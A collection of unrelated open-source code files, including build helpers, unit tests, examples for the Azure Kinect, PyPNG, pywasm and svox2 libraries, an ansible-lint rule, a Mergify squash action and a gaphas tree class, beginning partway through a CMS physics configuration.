taggingVarName = cms.string('vertexNTracks')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('massVertexEnergyFraction_0'),
taggingVarName = cms.string('massVertexEnergyFraction')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('vertexBoostOverSqrtJetPt_0'),
taggingVarName = cms.string('vertexBoostOverSqrtJetPt')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('leptonPtRel_0'),
taggingVarName = cms.string('leptonPtRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('leptonPtRel_1'),
taggingVarName = cms.string('leptonPtRel')
),
cms.PSet(
default = cms.double(-10000),
idx = cms.int32(0),
name = cms.string('leptonSip3d_0'),
taggingVarName = cms.string('leptonSip3d')
),
cms.PSet(
default = cms.double(-10000),
idx = cms.int32(1),
name = cms.string('leptonSip3d_1'),
taggingVarName = cms.string('leptonSip3d')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('leptonDeltaR_0'),
taggingVarName = cms.string('leptonDeltaR')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('leptonDeltaR_1'),
taggingVarName = cms.string('leptonDeltaR')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('leptonRatioRel_0'),
taggingVarName = cms.string('leptonRatioRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('leptonRatioRel_1'),
taggingVarName = cms.string('leptonRatioRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('leptonEtaRel_0'),
taggingVarName = cms.string('leptonEtaRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('leptonEtaRel_1'),
taggingVarName = cms.string('leptonEtaRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('leptonRatio_0'),
taggingVarName = cms.string('leptonRatio')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('leptonRatio_1'),
taggingVarName = cms.string('leptonRatio')
))
|
buildchain/buildchain/utils.py | SaintLoong/metalk8s | 255 | 12686400 | # coding: utf-8
"""Miscellaneous helpers."""
import inspect
import subprocess
import sys
from pathlib import Path
from typing import Any, Callable, Iterator, List, Optional
from docker.types import Mount # type: ignore
from buildchain import config
from buildchain import constants
from buildchain import types
def export_only_tasks(module_name: str) -> List[str]:
"""Return the list of tasks defined in the specified module.
Arguments:
module_name: name of the module
Returns:
The name of all the task-creator defined in this module.
"""
return [
name
for name, _ in inspect.getmembers(sys.modules[module_name], inspect.isfunction)
if name.startswith("task_")
]
def build_relpath(path: Path) -> Path:
"""Return the given path, but relative to the build root.
Arguments:
path: an absolute path inside the build directory
Returns:
The same path, but relative to the build directory.
Examples:
>>> build_relpath(Path('/home/foo/metalk8s/_build/metalk8s.iso'))
PosixPath('_build/metalk8s.iso')
"""
return path.relative_to(config.BUILD_ROOT.parent)
def title_with_target1(command: str) -> Callable[[types.Task], str]:
"""Return a title with the command suffixed with the first target.
Arguments:
command: name of the command
task: a doit task
Returns:
A function that returns the title
"""
def title(task: types.Task) -> str:
return "{cmd: <{width}} {path}".format(
cmd=command,
width=constants.CMD_WIDTH,
path=build_relpath(Path(task.targets[0])),
)
return title
def title_with_subtask_name(command: str) -> Callable[[types.Task], str]:
"""Return a title with the command suffixed with the sub-task name.
Arguments:
command: name of the command
task: a doit task
Returns:
A function that returns the title
"""
def title(task: types.Task) -> str:
# Extract the sub-task name (the part after `:`) from the task name.
return "{cmd: <{width}} {name}".format(
cmd=command, width=constants.CMD_WIDTH, name=task.name.split(":")[1]
)
return title
def bind_mount(source: Path, target: Path, **kwargs: Any) -> Mount:
"""Return a Docker mount object.
Arguments:
source: the host path to be mounted
target: the container path the source should be mounted to
Keyword arguments:
Passed through to the underlying docker.services.Mount object
initialization
"""
return Mount(source=str(source), target=str(target), type="bind", **kwargs)
def bind_ro_mount(source: Path, target: Path) -> Mount:
"""Return *read-only* Docker mount object.
Arguments:
source: the host path to be mounted
target: the container path the source should be mounted to
"""
return bind_mount(source=source, target=target, read_only=True)
def git_ls(directory: Optional[str] = None) -> Iterator[Path]:
"""Return the list of files tracked by Git under `root` (recursively).
Arguments:
directory: directory to list (relative to the root of the repo).
Returns:
A list of files tracked by Git.
"""
root = constants.ROOT if directory is None else constants.ROOT / directory
assert root.is_dir()
return map(
Path,
subprocess.check_output(
["git", "ls-files", "-z", root], encoding="utf-8"
).split("\x00")[:-1],
) # `:-1` to skip the last element (empty string).
def unlink_if_exist(filepath: Path) -> None:
"""Delete a file if it exists."""
try:
filepath.unlink()
except FileNotFoundError:
pass
|
third_party/blink/tools/diff_wpt_results_unittest.py | iridium-browser/iridium-browser | 575 | 12686420 | <filename>third_party/blink/tools/diff_wpt_results_unittest.py
#!/usr/bin/env vpython
# Copyright (C) 2021 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE COMPUTER, INC. ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE COMPUTER, INC. OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import copy
import io
import unittest
from diff_wpt_results import map_tests_to_results, create_csv
CSV_HEADING = 'Test name, Test Result, Baseline Result, Result Comparison'
class JsonResultsCompressTest(unittest.TestCase):
def test_compress_json(self):
output_mp = {}
input_mp = {'dir1': {'dir2': {'actual': 'PASS'}}}
map_tests_to_results(output_mp, input_mp)
self.assertEquals(output_mp, {'dir1/dir2': {'actual': 'PASS'}})
class CreateCsvTest(unittest.TestCase):
def test_name_with_comma_escaped_in_csv(self):
actual_mp = {'test, name.html': {'actual': 'PASS'}}
with io.BytesIO() as csv_out:
create_csv(actual_mp, actual_mp, csv_out)
csv_out.seek(0)
content = csv_out.read()
self.assertEquals(content, CSV_HEADING + '\n' +
'"test, name.html",PASS,PASS,SAME RESULTS\n')
def test_create_csv_with_same_result(self):
actual_mp = {'test.html': {'actual': 'PASS'}}
with io.BytesIO() as csv_out:
create_csv(actual_mp, actual_mp, csv_out)
csv_out.seek(0)
content = csv_out.read()
self.assertEquals(content, CSV_HEADING + '\n' +
'test.html,PASS,PASS,SAME RESULTS\n')
def test_create_csv_with_different_result(self):
actual_mp = {'test.html': {'actual': 'PASS'}}
baseline_mp = copy.deepcopy(actual_mp)
baseline_mp['test.html']['actual'] = 'FAIL'
with io.BytesIO() as csv_out:
create_csv(actual_mp, baseline_mp, csv_out)
csv_out.seek(0)
content = csv_out.read()
self.assertEquals(content, CSV_HEADING + '\n' +
'test.html,PASS,FAIL,DIFFERENT RESULTS\n')
def test_create_csv_with_missing_result(self):
actual_mp = {'test.html': {'actual': 'PASS'}}
with io.BytesIO() as csv_out:
create_csv(actual_mp, {}, csv_out)
csv_out.seek(0)
content = csv_out.read()
self.assertEquals(content, CSV_HEADING + '\n' +
'test.html,PASS,MISSING,MISSING RESULTS\n')
if __name__ == '__main__':
unittest.main()
|
src/python/k4a/examples/simple_viewer.py | seanyen/Azure-Kinect-Sensor-SDK | 1,120 | 12686421 | '''
simple_viewer.py
A simple viewer to demonstrate the image capture capabilities of an Azure
Kinect device using the Python API. This is not the fastest way to display
a sequence of images; this is only meant to show how to capture frames
in a sequence.
Requirements:
Users should install the following python packages before using this module:
matplotlib
Copyright (c) Microsoft Corporation. All rights reserved.
Licensed under the MIT License.
Kinect For Azure SDK.
'''
# This package is used for displaying the images.
# It is not part of the k4a package and is not a hard requirement for k4a.
# Users need to install these packages in order to use this module.
import matplotlib.pyplot as plt
# This will import all the public symbols into the k4a namespace.
import k4a
def simple_viewer():
# Open a device using the static function Device.open().
device = k4a.Device.open()
# In order to start capturing frames, need to start the cameras.
# The start_cameras() function requires a device configuration which
# specifies the modes in which to put the color and depth cameras.
# For convenience, the k4a package pre-defines some configurations
# for common usage of the Azure Kinect device, but the user can
# modify the values to set the device in their preferred modes.
device_config = k4a.DEVICE_CONFIG_BGRA32_2160P_WFOV_2X2BINNED_FPS15
device.start_cameras(device_config)
# Get a capture.
# The -1 tells the device to wait forever until a capture is available.
capture = device.get_capture(-1)
# Open a matplotlib figure to display images.
fig = plt.figure()
ax = []
ax.append(fig.add_subplot(1, 3, 1, label="Color"))
ax.append(fig.add_subplot(1, 3, 2, label="Depth"))
ax.append(fig.add_subplot(1, 3, 3, label="IR"))
# The capture has the following fields that can be read right away:
# color : the color image
# depth : the depth image
# ir : the ir image
im = []
im.append(ax[0].imshow(capture.color.data))
im.append(ax[1].imshow(capture.depth.data, cmap='jet'))
im.append(ax[2].imshow(capture.ir.data, cmap='gray'))
ax[0].title.set_text('Color')
ax[1].title.set_text('Depth')
ax[2].title.set_text('IR')
# Note: The data in the images is in BGRA planes, but the matplotlib
# library expects them to be in RGBA. This results in an inverted color
# display if not properly handled. The user can splice the planes as
# appropriate or use opencv which has a function call to transform
# BGRA into RGBA.
while fig is not None:
# Draw the figure with the images.
plt.pause(.1)
plt.draw()
# Get a new capture.
capture = device.get_capture(-1)
if capture is None:
del fig
break
# Update the images in the figures.
im[0].set_data(capture.color.data)
im[1].set_data(capture.depth.data)
im[2].set_data(capture.ir.data)
# There is no need to delete the capture since Python will take care of
# that in the object's deleter.
# There is no need to stop the cameras since the deleter will stop
# the cameras, but it's still prudent to do it explicitly.
device.stop_cameras()
# There is no need to delete resources since Python will take care
# of releasing resources in the objects' deleters.
if __name__ == '__main__':
simple_viewer()
|
lib/pypng-0.0.9/code/exnumpy.py | ceremetrix/X | 460 | 12686429 | <reponame>ceremetrix/X
#!/usr/bin/env python
# $URL: http://pypng.googlecode.com/svn/trunk/code/exnumpy.py $
# $Rev: 126 $
# Numpy example.
# Original code created by <NAME>, modified by <NAME>.
'''
Example code integrating RGB PNG files, PyPNG and NumPy
(abstracted from Mel Raab's functioning code)
'''
# http://www.python.org/doc/2.4.4/lib/module-itertools.html
import itertools
import numpy
import png
''' If you have a PNG file for an RGB image,
and want to create a numpy array of data from it.
'''
# Read the file "picture.png" from the current directory. The `Reader`
# class can take a filename, a file-like object, or the byte data
# directly; this suggests alternatives such as using urllib to read
# an image from the internet:
# png.Reader(file=urllib.urlopen('http://www.libpng.org/pub/png/PngSuite/basn2c16.png'))
pngReader=png.Reader(filename='picture.png')
# Tuple unpacking, using multiple assignment, is very useful for the
# result of asDirect (and other methods).
# See
# http://docs.python.org/tutorial/introduction.html#first-steps-towards-programming
row_count, column_count, pngdata, meta = pngReader.asDirect()
bitdepth=meta['bitdepth']
plane_count=meta['planes']
# Make sure we're dealing with RGB files
assert plane_count == 3
''' Boxed row flat pixel:
list([R,G,B, R,G,B, R,G,B],
[R,G,B, R,G,B, R,G,B])
Array dimensions for this example: (2,9)
Create `image_2d` as a two-dimensional NumPy array by stacking a
sequence of 1-dimensional arrays (rows).
The NumPy array mimics PyPNG's (boxed row flat pixel) representation;
it will have dimensions ``(row_count,column_count*plane_count)``.
'''
# The use of ``numpy.uint16``, below, is to convert each row to a NumPy
# array with data type ``numpy.uint16``. This is a feature of NumPy,
# discussed further in
# http://docs.scipy.org/doc/numpy/user/basics.types.html .
# You can use avoid the explicit conversion with
# ``numpy.vstack(pngdata)``, but then NumPy will pick the array's data
# type; in practice it seems to pick ``numpy.int32``, which is large enough
# to hold any pixel value for any PNG image but uses 4 bytes per value when
# 1 or 2 would be enough.
# --- extract 001 start
image_2d = numpy.vstack(itertools.imap(numpy.uint16, pngdata))
# --- extract 001 end
# Do not be tempted to use ``numpy.asarray``; when passed an iterator
# (`pngdata` is often an iterator) it will attempt to create a size 1
# array with the iterator as its only element.
# An alternative to the above is to create the target array of the right
# shape, then populate it row by row:
if 0:
image_2d = numpy.zeros((row_count,plane_count*column_count),
dtype=numpy.uint16)
for row_index, one_boxed_row_flat_pixels in enumerate(pngdata):
image_2d[row_index,:]=one_boxed_row_flat_pixels
del pngReader
del pngdata
''' Reconfigure for easier referencing, similar to
Boxed row boxed pixel:
list([ (R,G,B), (R,G,B), (R,G,B) ],
[ (R,G,B), (R,G,B), (R,G,B) ])
Array dimensions for this example: (2,3,3)
``image_3d`` will contain the image as a three-dimensional numpy
array, having dimensions ``(row_count,column_count,plane_count)``.
'''
# --- extract 002 start
image_3d = numpy.reshape(image_2d,
(row_count,column_count,plane_count))
# --- extract 002 end
''' ============= '''
''' Convert NumPy image_3d array to PNG image file.
If the data is three-dimensional, as it is above, the best thing
to do is reshape it into a two-dimensional array with a shape of
``(row_count, column_count*plane_count)``. Because a
two-dimensional numpy array is an iterator, it can be passed
directly to the ``png.Writer.write`` method.
'''
row_count, column_count, plane_count = image_3d.shape
assert plane_count==3
pngfile = open('picture_out.png', 'wb')
try:
# This example assumes that you have 16-bit pixel values in the data
# array (that's what the ``bitdepth=16`` argument is for).
# If you don't, then the resulting PNG file will likely be
# very dark. Hey, it's only an example.
pngWriter = png.Writer(column_count, row_count,
greyscale=False,
alpha=False,
bitdepth=16)
# As of 2009-04-13 passing a numpy array that has an element type
# that is a numpy integer type (for example, the `image_3d` array has an
# element type of ``numpy.uint16``) generates a deprecation warning.
# This is probably a bug in numpy; it may go away in the future.
# The code still works despite the warning.
# See http://code.google.com/p/pypng/issues/detail?id=44
# --- extract 003 start
pngWriter.write(pngfile,
numpy.reshape(image_3d, (-1, column_count*plane_count)))
# --- extract 003 end
finally:
pngfile.close()
|
src/ansiblelint/rules/key_order.py | willthames/ansible-lint | 1,192 | 12686432 | """All tasks should be have name come first."""
import sys
from typing import Any, Dict, Optional, Union
from ansiblelint.file_utils import Lintable
from ansiblelint.rules import AnsibleLintRule
from ansiblelint.testing import RunFromText
class KeyOrderRule(AnsibleLintRule):
"""Ensure specific order of keys in mappings."""
id = "key-order"
shortdesc = __doc__
severity = "LOW"
tags = ["formatting", "experimental"]
version_added = "v6.2.0"
needs_raw_task = True
def matchtask(
self, task: Dict[str, Any], file: Optional[Lintable] = None
) -> Union[bool, str]:
raw_task = task["__raw_task__"]
if "name" in raw_task:
attribute_list = [*raw_task]
if bool(attribute_list[0] != "name"):
return "'name' key is not first"
return False
# testing code to be loaded only with pytest or when executed the rule file
if "pytest" in sys.modules:
import pytest
PLAY_FAIL = """---
- hosts: localhost
tasks:
- no_log: true
shell: echo hello
name: task with no_log on top
- when: true
name: task with when on top
shell: echo hello
- delegate_to: localhost
name: delegate_to on top
shell: echo hello
- loop:
- 1
- 2
name: loopy
command: echo {{ item }}
- become: true
name: become first
shell: echo hello
- register: test
shell: echo hello
name: register first
"""
PLAY_SUCCESS = """---
- hosts: localhost
tasks:
- name: test
command: echo "test"
- name: test2
debug:
msg: "Debug without a name"
- name: Flush handlers
meta: flush_handlers
- no_log: true # noqa key-order
shell: echo hello
name: task with no_log on top
"""
@pytest.mark.parametrize("rule_runner", (KeyOrderRule,), indirect=["rule_runner"])
def test_task_name_has_name_first_rule_pass(rule_runner: RunFromText) -> None:
"""Test rule matches."""
results = rule_runner.run_playbook(PLAY_SUCCESS)
assert len(results) == 0
@pytest.mark.parametrize("rule_runner", (KeyOrderRule,), indirect=["rule_runner"])
def test_task_name_has_name_first_rule_fail(rule_runner: RunFromText) -> None:
"""Test rule matches."""
results = rule_runner.run_playbook(PLAY_FAIL)
assert len(results) == 6
|
examples/fib.py | chen3feng/pywasm | 337 | 12686438 | <filename>examples/fib.py
import pywasm
# pywasm.on_debug()
runtime = pywasm.load('./examples/fib.wasm')
r = runtime.exec('fib', [10])
print(r)
|
cloudbio/custom/galaxy.py | glebkuznetsov/cloudbiolinux | 122 | 12686457 | <gh_stars>100-1000
"""
Install any components that fall under 'galaxy' directive in main.yaml
"""
from cloudbio.galaxy import _setup_users
from cloudbio.galaxy import _setup_galaxy_env_defaults
from cloudbio.galaxy import _install_galaxy
from cloudbio.galaxy import _configure_galaxy_options
def install_galaxy_webapp(env):
_prep_galaxy(env)
_install_galaxy(env)
_configure_galaxy_options(env)
def _prep_galaxy(env):
_setup_users(env)
_setup_galaxy_env_defaults(env)
|
mergify_engine/actions/squash.py | truthiswill/mergify-engine | 266 | 12686459 | <reponame>truthiswill/mergify-engine<gh_stars>100-1000
# -*- encoding: utf-8 -*-
#
# Copyright © 2021 Mergify SAS
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import typing
import voluptuous
from mergify_engine import actions
from mergify_engine import check_api
from mergify_engine import context
from mergify_engine import rules
from mergify_engine import signals
from mergify_engine import squash_pull
from mergify_engine.actions import utils as action_utils
from mergify_engine.dashboard import subscription
from mergify_engine.rules import types
class SquashAction(actions.Action):
flags = (
actions.ActionFlag.ALLOW_AS_ACTION
| actions.ActionFlag.ALLOW_AS_COMMAND
| actions.ActionFlag.ALWAYS_RUN
| actions.ActionFlag.ALLOW_ON_CONFIGURATION_CHANGED
| actions.ActionFlag.DISALLOW_RERUN_ON_OTHER_RULES
)
validator = {
voluptuous.Required("bot_account", default=None): voluptuous.Any(
None, types.Jinja2
),
voluptuous.Required("commit_message", default="all-commits"): voluptuous.Any(
"all-commits", "first-commit", "title+body"
),
}
@staticmethod
def command_to_config(string: str) -> typing.Dict[str, typing.Any]:
if string:
return {"commit_message": string.strip()}
else:
return {}
async def run(
self, ctxt: context.Context, rule: rules.EvaluatedRule
) -> check_api.Result:
try:
bot_account = await action_utils.render_bot_account(
ctxt,
self.config["bot_account"],
required_feature=subscription.Features.BOT_ACCOUNT,
missing_feature_message="Squash with `bot_account` set are disabled",
required_permissions=[],
)
except action_utils.RenderBotAccountFailure as e:
return check_api.Result(e.status, e.title, e.reason)
if ctxt.pull["commits"] <= 1:
return check_api.Result(
check_api.Conclusion.SUCCESS,
"Pull request is already one-commit long",
"",
)
try:
commit_title_and_message = await ctxt.pull_request.get_commit_message()
except context.RenderTemplateFailure as rmf:
return check_api.Result(
check_api.Conclusion.ACTION_REQUIRED,
"Invalid commit message",
str(rmf),
)
if commit_title_and_message is not None:
title, message = commit_title_and_message
message = f"{title}\n\n{message}"
elif self.config["commit_message"] == "all-commits":
message = f"{(await ctxt.pull_request.title)} (#{(await ctxt.pull_request.number)})\n"
message += "\n\n* ".join(
[commit["commit_message"] for commit in await ctxt.commits]
)
elif self.config["commit_message"] == "first-commit":
message = (await ctxt.commits)[0]["commit_message"]
elif self.config["commit_message"] == "title+body":
message = f"{(await ctxt.pull_request.title)} (#{(await ctxt.pull_request.number)})"
message += f"\n\n{await ctxt.pull_request.body}"
else:
raise RuntimeError("Unsupported commit_message option")
try:
await squash_pull.squash(
ctxt,
message,
bot_account,
)
except squash_pull.SquashFailure as e:
return check_api.Result(
check_api.Conclusion.FAILURE, "Pull request squash failed", e.reason
)
else:
await signals.send(ctxt, "action.squash")
return check_api.Result(
check_api.Conclusion.SUCCESS, "Pull request squashed successfully", ""
)
async def cancel(
self, ctxt: context.Context, rule: "rules.EvaluatedRule"
) -> check_api.Result: # pragma: no cover
return actions.CANCELLED_CHECK_REPORT
|
gaphas/tree.py | gaphor/gaphas | 108 | 12686461 | """Simple class containing the tree structure for the canvas items."""
from typing import Dict, Generic, Iterable, List, Optional, Sequence, TypeVar, Union
T = TypeVar("T")
class Tree(Generic[T]):
"""A Tree structure. Nodes are stores in a depth-first order.
``None`` is the root node.
@invariant: len(self._children) == len(self._nodes) + 1
"""
def __init__(self) -> None:
# List of nodes in the tree, sorted in the order they ought to be
# rendered
self._nodes: List[T] = []
# Per entry a list of children is maintained.
self._children: Dict[Union[T, None], List[T]] = {None: []}
# For easy and fast lookups, also maintain a child -> parent mapping
self._parents: Dict[T, T] = {}
@property
def nodes(self) -> Sequence[T]:
return list(self._nodes)
def get_parent(self, node: T) -> Optional[T]:
"""Return the parent item of ``node``.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.get_parent('n2')
'n1'
"""
return self._parents.get(node)
def get_children(self, node: Optional[T]) -> Iterable[T]:
"""Return all child objects of ``node``.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n1')
>>> tree.get_children('n1')
['n2', 'n3']
>>> tree.get_children('n2')
[]
"""
return self._children[node]
def get_siblings(self, node: T) -> List[T]:
"""Get all siblings of ``node``, including ``node``.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n1')
>>> tree.get_siblings('n2')
['n2', 'n3']
"""
parent = self.get_parent(node)
return self._children[parent]
def get_next_sibling(self, node: T) -> T:
"""Return the node on the same level after ``node``.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n1')
>>> tree.get_next_sibling('n2')
'n3'
>>> tree.get_next_sibling('n3') # doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: list index out of range
"""
parent = self.get_parent(node)
siblings = self._children[parent]
return siblings[siblings.index(node) + 1]
def get_previous_sibling(self, node: T) -> T:
"""Return the node on the same level before ``node``.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n1')
>>> tree.get_previous_sibling('n3')
'n2'
>>> tree.get_previous_sibling('n2') # doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: list index out of range
"""
parent = self.get_parent(node)
siblings = self._children[parent]
index = siblings.index(node) - 1
if index < 0:
raise IndexError("list index out of range")
return siblings[index]
def get_all_children(self, node: T) -> Iterable[T]:
"""Iterate all children (and children of children and so forth)
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n2')
>>> tree.get_children('n1')
['n2']
>>> tree.get_all_children('n1') # doctest: +ELLIPSIS
<generator object Tree.get_all_children at 0x...>
>>> list(tree.get_all_children('n1'))
['n2', 'n3']
"""
children = self.get_children(node)
for c in children:
yield c
yield from self.get_all_children(c)
def get_ancestors(self, node: T) -> Iterable[T]:
"""Iterate all parents and parents of parents, etc.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n2')
>>> tree.get_parent('n3')
'n2'
>>> tree.get_ancestors('n3') # doctest: +ELLIPSIS
<generator object Tree.get_ancestors at 0x...>
>>> list(tree.get_ancestors('n3'))
['n2', 'n1']
>>> list(tree.get_ancestors('n1'))
[]
"""
parent = self.get_parent(node)
while parent:
yield parent
parent = self.get_parent(parent)
def order(self, items: Iterable[T]) -> Iterable[T]:
items_set = set(items)
return (n for n in self._nodes if n in items_set)
def _add_to_nodes(
self, node: T, parent: Optional[T], index: Optional[int] = None
) -> None:
"""Helper method to place nodes on the right location in the nodes list
Called only from add() and move()"""
nodes = self._nodes
siblings = self._children[parent]
try:
atnode = siblings[index] # type: ignore[index]
except (TypeError, IndexError):
index = len(siblings)
if parent:
try:
next_uncle = self.get_next_sibling(parent)
except IndexError:
# parent has no younger brothers..
# place it before the next uncle of grant_parent:
return self._add_to_nodes(node, self.get_parent(parent))
else:
nodes.insert(nodes.index(next_uncle), node)
else:
# append to root node:
nodes.append(node)
else:
nodes.insert(nodes.index(atnode), node)
def _add(
self, node: T, parent: Optional[T] = None, index: Optional[int] = None
) -> None:
"""Helper method for both add() and move()."""
assert node not in self._nodes
siblings = self._children[parent]
self._add_to_nodes(node, parent, index)
# Fix parent-child and child-parent relationship
try:
siblings.insert(index, node) # type: ignore[arg-type]
except TypeError:
siblings.append(node)
# Create new entry for it's own children:
if parent:
self._parents[node] = parent
def add(
self, node: T, parent: Optional[T] = None, index: Optional[int] = None
) -> None:
"""Add node to the tree. parent is the parent node, which may be None
if the item should be added to the root item.
For usage, see the unit tests.
"""
self._add(node, parent, index)
self._children[node] = []
def _remove(self, node: T) -> None:
# Remove from parent item
self.get_siblings(node).remove(node)
# Remove data entries:
del self._children[node]
self._nodes.remove(node)
try:
del self._parents[node]
except KeyError:
pass
def remove(self, node: T) -> None:
"""Remove ``node`` from the tree.
For usage, see the unit tests.
"""
# First remove children:
for c in reversed(list(self._children[node])):
self.remove(c)
self._remove(node)
def _reparent_nodes(self, node: T, parent: Optional[T]) -> None:
"""Helper for move().
The _children and _parent trees can be left intact as far as
children of the reparented node are concerned. Only the position
in the _nodes list changes.
"""
self._nodes.remove(node)
self._add_to_nodes(node, parent)
for c in self._children[node]:
self._reparent_nodes(c, node)
def move(self, node: T, parent: Optional[T], index: Optional[int] = None) -> None:
"""Set new parent for a ``node``. ``Parent`` can be ``None``,
indicating it's added to the top.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n1')
>>> tree.nodes
['n1', 'n2', 'n3']
>>> tree.move('n2', 'n3')
>>> tree.get_parent('n2')
'n3'
>>> tree.get_children('n3')
['n2']
>>> tree.nodes
['n1', 'n3', 'n2']
If a node contains children, those are also moved:
>>> tree.add('n4')
>>> tree.nodes
['n1', 'n3', 'n2', 'n4']
>>> tree.move('n1', 'n4')
>>> tree.get_parent('n1')
'n4'
>>> list(tree.get_all_children('n4'))
['n1', 'n3', 'n2']
>>> tree.nodes
['n4', 'n1', 'n3', 'n2']
"""
if parent is self.get_parent(node):
return
# Remove all node references:
old_parent = self.get_parent(node)
self._children[old_parent].remove(node)
self._nodes.remove(node)
if old_parent:
del self._parents[node]
self._add(node, parent, index)
# reorganize children in nodes list
for c in self._children[node]:
self._reparent_nodes(c, node)
|
tests/test_init.py | fariddarabi/fastapi-chameleon | 118 | 12686467 | import pytest
import fastapi_chameleon as fc
from fastapi_chameleon.exceptions import FastAPIChameleonException
def test_cannot_decorate_with_missing_init():
fc.engine.clear()
with pytest.raises(FastAPIChameleonException):
@fc.template('home/index.pt')
def view_method(a, b, c):
return {"a": a, "b": b, "c": c}
view_method(1, 2, 3)
def test_can_call_init_with_good_path(test_templates_path):
fc.global_init(str(test_templates_path), cache_init=False)
# Clear paths so as to no affect future tests
fc.engine.clear()
def test_cannot_call_init_with_bad_path(test_templates_path):
bad_path = test_templates_path / "missing"
with pytest.raises(Exception):
fc.global_init(str(bad_path), cache_init=False)
|
mongomock/object_id.py | moonso/mongomock | 574 | 12686474 | <reponame>moonso/mongomock
import uuid
class ObjectId(object):
def __init__(self, id=None):
super(ObjectId, self).__init__()
if id is None:
self._id = uuid.uuid1()
else:
self._id = uuid.UUID(id)
def __eq__(self, other):
return isinstance(other, ObjectId) and other._id == self._id
def __ne__(self, other):
return not self == other
def __hash__(self):
return hash(self._id)
def __repr__(self):
return 'ObjectId({0})'.format(self._id)
def __str__(self):
return str(self._id)
|
test/test_render_visual.py | QiukuZ/svox2 | 1,724 | 12686488 | <gh_stars>1000+
import svox2
import torch
import numpy as np
from util import Timing
from matplotlib import pyplot as plt
device='cuda:0'
GRID_FILE = 'lego.npy'
grid = svox2.SparseGrid(reso=256, device='cpu', radius=1.3256)
data = torch.from_numpy(np.load(GRID_FILE)).view(-1, grid.data_dim)
grid.sh_data.data = data[..., 1:]
grid.density_data.data = data[..., :1]
# grid.resample(128, use_z_order=True)
grid = grid.cuda()
c2w = torch.tensor([
[ -0.9999999403953552, 0.0, 0.0, 0.0 ],
[ 0.0, -0.7341099977493286, 0.6790305972099304, 2.737260103225708 ],
[ 0.0, 0.6790306568145752, 0.7341098785400391, 2.959291696548462 ],
[ 0.0, 0.0, 0.0, 1.0 ],
], device=device)
with torch.no_grad():
width = height = 800
fx = fy = 1111
origins = c2w[None, :3, 3].expand(height * width, -1).contiguous()
yy, xx = torch.meshgrid(
torch.arange(height, dtype=torch.float64, device=c2w.device),
torch.arange(width, dtype=torch.float64, device=c2w.device),
)
xx = (xx - width * 0.5) / float(fx)
yy = (yy - height * 0.5) / float(fy)
zz = torch.ones_like(xx)
dirs = torch.stack((xx, -yy, -zz), dim=-1)
dirs /= torch.norm(dirs, dim=-1, keepdim=True)
dirs = dirs.reshape(-1, 3)
del xx, yy, zz
dirs = torch.matmul(c2w[None, :3, :3].double(), dirs[..., None])[..., 0].float()
dirs = dirs / torch.norm(dirs, dim=-1, keepdim=True)
rays = svox2.Rays(origins, dirs)
for i in range(5):
with Timing("ours"):
im = grid.volume_render(rays, use_kernel=True)
im = im.reshape(height, width, 3)
im = im.detach().clamp_(0.0, 1.0).cpu()
plt.imshow(im)
plt.show()
|
